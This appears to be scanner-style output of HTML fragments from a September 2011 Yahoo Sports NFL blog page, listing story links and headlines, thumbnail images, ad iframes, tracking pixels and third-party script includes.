<img src="http://l.yimg.com/iu/api/res/1.2/DO19w.oidtwvdIr1uvR..w--/YXBwaWQ9eXZpZGVvO2NoPTIzMDtjcj0xO2N3PTM0MztkeD0zOTtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://d.yimg.com/a/p/sp/pfw/72/fullj.d31be56e39031f27aa6903d7c8ccdb0b/20110904_nfc_free_agent_moves_0.jpg" title="Free agent moves" alt="Free agent moves" width="94" height="63">
</a>
...[SNIP]...
ttp://sports.yahoo.com/nfl/news?slug=nfp-20110904_mark_herzlich_beats_the_odds_makes_giants_roster&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Herzlich beats the odds">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-leeroyselmon&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Selmon is improving">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=ap-worlds-semenya&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="South African runner's valiant return">
<img src="http://l.yimg.com/iu/api/res/1.2/1J1FJn2FsGUNJqTveVRpJQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/semenya.jpg" title="South African runner's valiant return" alt="South African runner's valiant return" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=ap-worlds&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Bolt, Jamaica take gold">
<img src="http://l.yimg.com/iu/api/res/1.2/97klez0UFQMbKD7UV7d0.Q--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/e5/fullj.7d1639ed4877ae02a0cee5b1991a05fe/ap-201109020839311726658.jpg" title="Bolt, Jamaica take gold" alt="Bolt, Jamaica take gold" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/olympics/news?slug=ap-2020bids&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Six bid for 2020 Olympics">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/top/news?slug=reu-worldmentriple_jump_pix&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="American pulls upset">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/blog/big_league_stew/post/Wedgie-Foul-ball-sticks-in-mask-of-Mariners-cat?urn=mlb-wp18471&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Foul ball's funny landing place">
<img src="http://l.yimg.com/iu/api/res/1.2/L_C_0HS.bC_7fqRT3udDuw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/stuck.jpg" title="Foul ball's funny landing place" alt="Foul ball's funny landing place" width="94" height="63">
</a>
...[SNIP]...
ost/32-keys-to-the-NFL-8217-s-2011-season-Part-II-?urn=nfl-wp6499&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part II)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/post/32-keys-to-the-NFL-8217-s-2011-season-Part-I-?urn=nfl-wp6496&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part I)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Colbert-found-his-way-back-onto-a?urn=nfl-wp6492&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Somehow, Keary Colbert found his way back onto an NFL roster">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-committed-to-non-committal-on-Qu?urn=nfl-wp6489&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Broncos are committed to non-committal on Quinn vs. Tebow">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Brothers-it-isn-8217-t-about-the-?urn=nfl-wp6481&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="For the Ryan Brothers, it isn...t about the laughs right now">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
g/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
down-Corner-Week-1-Preview-Podcast-Greg?urn=nfl-wp6458&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Shutdown Corner Week 1 Preview Podcast: Greg Cosell">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-s-employment-until-sev?urn=nfl-wp6446&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Colts delay Tressel...s employment until seventh week of regular season">
<img src="http://l.yimg.com/iu/api/res/1.2/tcsbrnHu2XoIp0S0.Ckzsw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/tressel-pd.jpg" title="Colts delay Tressel...s employment until seventh week of regular season" alt="Colts delay Tressel...s employment until seventh week of regular season" width="94" height="63">
</a>
...[SNIP]...
it-looks-like-Manning-8217-s-str?urn=nfl-wp6439&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="More and more, it looks like Manning...s streak is in jeopardy">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
aneers-Hall-of-Famer-Lee-Roy-Selmo?urn=nfl-wp6433&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Tampa Bay Buccaneers Hall of Famer Lee Roy Selmon dies at 56">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
log/shutdown_corner/post/Aaron-Rodgers-8217-handlebar-mustache-gives-hi?urn=nfl-wp6423&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="QB's impressive 'stache">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
_corner/post/Former-Pats-safety-Brandon-Meriweather-leads-lis?urn=nfl-wp6406&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Prominent NFL players on the move">
<img src="http://l.yimg.com/iu/api/res/1.2/PXuMXOwJ2uaXo5fYsMtxbQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/cuts.jpg" title="Prominent NFL players on the move" alt="Prominent NFL players on the move" width="94" height="63">
</a>
...[SNIP]...
rudge-might-8216?urn=nfl-wp6399&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Troy Aikman still carries a grudge, might ...get physical... with Skip Bayless">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-mean-more-to-Packers-LB-Vic-So-?urn=nfl-wp6392&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Preseason could mean more to Packers LB Vic So...oto than most">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
wn_corner/post/The-Shutdown-Corner-Podcast-Mike-Silver?urn=nfl-wp6388&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Shutdown Corner Podcast: Mike Silver">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
back-8?urn=nfl-wp6382&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Haynesworth would ...give that money back... to have played for Pats instead of Redskins">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
orner/post/Colts-hire-Jim-Tressel-as-8216-gameday-consult?urn=nfl-wp6368&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Ousted Ohio State coach lands NFL job">
<img src="http://l.yimg.com/iu/api/res/1.2/h_zLXLqXGLxqtLROuGO0hQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/02/tressel.jpg" title="Ousted Ohio State coach lands NFL job" alt="Ousted Ohio State coach lands NFL job" width="94" height="63">
</a>
...[SNIP]...
corner/post/Video-Theismann-windily-calls-out-Redskins-retur?urn=nfl-wp6337&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="'Stupid' play infuriates announcer">
<img src="http://l.yimg.com/iu/api/res/1.2/CFHAgrHng88MCICCWPs.Ag--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/banks-pd.jpg" title="'Stupid' play infuriates announcer" alt="'Stupid' play infuriates announcer" width="94" height="63">
</a>
...[SNIP]...
-has-an-art-gallery-and-somebody-br?urn=nfl-wp6331&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Chris Cooley has an art gallery, and somebody broke into it">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
n_corner/post/A-week-before-the-season-Lance-Briggs-asks-to-b?urn=nfl-wp6329&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="NFL player's poorly timed request">
<img src="http://l.yimg.com/iu/api/res/1.2/4SGMPg8hKSC75E289QQ3XQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/02/briggs.jpg" title="NFL player's poorly timed request" alt="NFL player's poorly timed request" width="94" height="63">
</a>
...[SNIP]...
/shutdown_corner/post/Newton-causes-Bo-Jackson-to-wax-rhapsodic-gets-?urn=nfl-wp6323&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Bo Jackson praises rookie">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
g/shutdown_corner/post/Dez-Bryant-is-now-living-life-on-the-straight-an?urn=nfl-wp6320&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Dez Bryant's turnaround">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ccaneerss-WR-Mike-Williams-guarantees-playoffs?urn=nfl-wp6314&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Buccaneerss WR Mike Williams guarantees playoffs">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
down_corner/post/The-Shutdown-Corner-Podcast-Rich-Eisen?urn=nfl-wp6310&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Shutdown Corner Podcast: Rich Eisen">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
yan-compares-Michele-Bachmann-to-Terrell-?urn=nfl-wp6302&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Jon Runyan compares Michele Bachmann to Terrell Owens">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
r/post/And-now-an-MRI-of-Braylon-Edwards-8217-hands?urn=nfl-wp6294&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="And now, an MRI of Braylon Edwards... hands">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
n_corner/post/Jerry-Jones-might-have-talked-himself-out-of-a-b?urn=nfl-wp6283&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="NFL owner's joke could be costly">
<img src="http://l.yimg.com/iu/api/res/1.2/znW.5ZhfWEz4FHFcKOfAlA--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/us/i/ww/news/2011/09/01/jones.jpg" title="NFL owner's joke could be costly" alt="NFL owner's joke could be costly" width="94" height="63">
</a>
...[SNIP]...
sville-guard-Edgar-Sosa-suffers-gruesome-?urn=ncaab-wp4622&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Ex-Louisville guard Edgar Sosa suffers gruesome broken leg">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
217-s-departure-extends-Wake-Fore?urn=ncaab-wp4618&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="J.T. Terrell...s departure extends Wake Forest...s run of bad luck">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
of-Vancouver-blames-NHL-for-riots-embarras?urn=nhl-wp11913&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="City of Vancouver blames NHL for riots, embarrasses itself">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Wozniacki-lacks-many-things-fight-is-n?urn=ten-wp2976&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Caroline Wozniacki lacks many things, fight is not one of them">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
usted_racquet/post/U-S-Open-women-8217-s-quarterfinal-preview?urn=ten-wp2965&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="U.S. Open women...s quarterfinal preview">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
orner/post/32-keys-to-the-NFL-8217-s-2011-season-Part-II-?urn=nfl-wp6499&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part II)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
_corner/post/32-keys-to-the-NFL-8217-s-2011-season-Part-I-?urn=nfl-wp6496&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part I)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ideo-Witness-Andrew-Ference-8217-s-Stanley-Cu?urn=nhl-wp11900&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Video: Witness Andrew Ference...s Stanley Cup flash mob">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ers-GM-Holmgren-injured-in-8216-ser?urn=nhl-wp11901&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Report: Flyers GM Holmgren injured in ...serious... bike accident">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-s-new-helmets-are-even-m?urn=ncaaf-wp5948&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Somehow, Maryland...s new helmets are even more Maryland-y than we thought">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
oto-of-the-day-Jo-Wilfriend-Tsonga-eats-a-ten?urn=ten-wp2972&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Photo of the day: Jo-Wilfriend Tsonga eats a tennis ball">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
217-s-temper-costs-him-two-shots-a?urn=golf-wp5410&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Nick Watney...s temper costs him two shots as he cards 11 on par-5">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Tsonga-on-court-during-argument-abo?urn=ten-wp2967&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Fish insults Tsonga on court during argument about player...s box">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
w-Keary-Colbert-found-his-way-back-onto-a?urn=nfl-wp6492&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Somehow, Keary Colbert found his way back onto an NFL roster">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
st/Breaking-news-American-golf-is-not-dead-after-a?urn=golf-wp5406&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Breaking news: American golf is not dead after all">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
The-Longest-Game-for-Cystic-Fibrosis-is-in-the-b?urn=nhl-wp11877&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="The Longest Game for Cystic Fibrosis is in the books">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
cos-are-committed-to-non-committal-on-Qu?urn=nfl-wp6489&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="The Broncos are committed to non-committal on Quinn vs. Tebow">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/FedEx-Cupdate-Who-8217-s-headed-to-Chicago-for?urn=golf-wp5396&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="FedEx Cupdate: Who...s headed to Chicago for the BMW?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
day-Boise-State-uncovers-Georgia-?urn=ncaaf-wp5937&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Mid-Major Monday: Boise State uncovers Georgia...s pressure points">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
he-Ryan-Brothers-it-isn-8217-t-about-the-?urn=nfl-wp6481&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="For the Ryan Brothers, it isn...t about the laughs right now">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-coach-takes-mystery-flatulence-as-sign-?urn=sow-wp4670&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Flamengo coach takes mystery flatulence as sign of disrespect">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
Daddy-NHL-Season-Preview-2011-12-Carolina-?urn=nhl-wp11870&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Puck Daddy NHL Season Preview 2011-12: Carolina Hurricanes">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
or-Day-Marvin-Miller-Joe-Niekro-Nola?urn=mlb-wp18621&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Happy Labor Day! Marvin Miller, Joe Niekro, Nolan Ryan talk shop">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
aling-ahem-look-inside-KHL-cheerlea?urn=nhl-wp11867&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Video: Revealing, ahem, look inside KHL cheerleader dressing room">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-that-Malbranque-retires-to-care-fo?urn=sow-wp4665&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Media reports that Malbranque retires to care for non-existent son">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ey-8217-s-tough-guys-need-their-own-repr?urn=nhl-wp11832&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Do hockey...s tough guys need their own representative body?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
nfl/blog/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
eadlines-NHL-mental-health-debate-hockey?urn=nhl-wp11861&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Puck Headlines: NHL mental health debate; hockey wedding vid">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://add.my.yahoo.com/rss?url=http://sports.yahoo.com/nfl/blog/shutdown_corner/rss.xml"><img src="http://l.yimg.com/a/i/us/my/addtomyyahoo4.gif" alt="Add to My Yahoo!" width="91" height="17" border="0"></a>
<a href="http://sports.yahoo.com/nfl/blog/shutdown_corner/rss.xml"><img src="http://l.yimg.com/a/i/us/ext/rss4.gif" alt="RSS" width="17" height="17" border="0"></a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443" title="Tiki Barber remains unemployed and sad"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315235529.jpg" class="thumb" /></a>
...[SNIP]...
o ear hole. Wilson's perspective is a little different from most players because of his peculiar path to the NFL. He spent two years in jail on a murder charge before winning acquittal in July 2009."><img src="http://l.yimg.com/iu/api/res/1.2/BPKGQ0jdhpW3wZ1h2.sLAg--/YXBwaWQ9eXZpZGVvO2NoPTExNDtjcj0xO2N3PTExNDtkeD05O2R5PTE7Zmk9dWxjcm9wO2g9NzU7cT03MDt3PTc1/http://d.yimg.com/a/p/sp/ap/ef/thumbe.762be49a500597e37c663af513f03336/ap-201109051652607617151.jpg" width="75" height="75"></a>
...[SNIP]...
109051622589677032:1" title="Washington Redskins quarterback Rex Grossman warms up before an NFL preseason football game against the Tampa Bay Buccaneers in Landover, Md., on Thursday, Sept. 1, 2011."><img src="http://l.yimg.com/iu/api/res/1.2/kvW5ryKw33IEylfO4yeWWw--/YXBwaWQ9eXZpZGVvO2NoPTg3O2NyPTE7Y3c9ODc7ZHg9MTtkeT0xO2ZpPXVsY3JvcDtoPTc1O3E9NzA7dz03NQ--/http://d.yimg.com/a/p/sp/ap/5c/thumbe.33d686071b58a0e7f7c893610da085d5/ap-201109051622589677032.jpg" width="75" height="75"></a>
...[SNIP]...
the Washington Redskins in Indianapolis. Manning is doubtful for Sunday's season opener against the Texans as he continues to recover from neck surgery, putting his streak of 227 starts in jeopardy."><img src="http://l.yimg.com/iu/api/res/1.2/7AmHvSwfughfnOWbICRuaQ--/YXBwaWQ9eXZpZGVvO2NoPTEwMjtjcj0xO2N3PTEwMjtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NzU7cT03MDt3PTc1/http://d.yimg.com/a/p/sp/ap/81/thumbe.69d59efaf75e1ded02d10de93c2dc147/ap-201109051559575906941.jpg" width="75" height="75"></a>
...[SNIP]...
<li><a href="http://www.footballoutsiders.com/" title="Football Outsiders">Football Outsiders <span>
...[SNIP]...
<li><a href="http://espn.go.com/blog/nflnation" title="Hashmarks">Hashmarks <span>
...[SNIP]...
<li><a href="http://kissmesuzy.blogspot.com/" title="Kissing Suzy Kolber">Kissing Suzy Kolber <span>
...[SNIP]...
<li><a href="http://beta.profootballtalk.com/category/rumor-mill/" title="Pro Football Talk">Pro Football Talk <span>
...[SNIP]...
<noscript><iframe src="http://uac.advertising.com/wrapper/aceUAC.htm#site=766755&size=180150"scrolling="no" width="180" height="150" frameborder="0" marginheight="0" marginwidth="0" title="Advertisement"></iframe>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=Ar3rYXBPTB5YfC6vMuLwflDSrYZ4/SIG=123j3k5uq/EXP=1316522681/**http%3A//yahoosports.teamfanshop.com/NFL_Football" class="yspmore"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/05/ipt/1305312565.jpg" alt="Shop for NFL Draft Gear!" title="Shop for NFL Draft Gear!"></a>
...[SNIP]...
<div id="n">
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://ad.yieldmanager.com/st?_PVID=0QKTVmKIPE7pARpjTl.wjQLGMhd7ak5mFbkACuv1&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313081873363&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15jvnv6p7/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320281/L=0QKTVmKIPE7pARpjTl.wjQLGMhd7ak5mFbkACuv1/B=3yzPKdj8fcA-/J=1315313081873363/K=dHuXEgTLQ4cGOnShgI49sw/A=6261245/R=0/*"></IFRAME>
...[SNIP]...
</noscript> <img src="http://ad.yieldmanager.com/pixel?id=1246264&t=2" width="1" height="1" /><script language=javascript>
...[SNIP]...
</noscript> <img width="0" height="0" border="0" src="http://ad.yieldmanager.com/pixel?adv=23351&t=2"><script language=javascript>
...[SNIP]...
</script><script id="load_wrapper" type="text/javascript" src="http://mi.adinterax.com/wrapper.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.9.0/build/yahoo/yahoo-min.js&d/lib/yui/2.9.0/build/event/event-min.js&d/lib/yui/2.9.0/build/dom/dom-min.js&d/lib/yui/2.9.0/build/imageloader/imageloader-min.js&d/lib/yui/2.9.0/build/get/get-min.js&d/lib/yui/2.9.0/build/connection/connection-min.js&d/lib/yui/2.9.0/build/animation/animation-min.js&d/lib/yui/2.9.0/build/json/json-min.js&d/lib/yui/2.9.0/build/container/container-min.js&d/lib/yui/2.9.0/build/element/element-min.js&d/lib/yui/2.9.0/build/cookie/cookie-min.js&d/lib/media/phugc/mwphcom_min_r142.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...
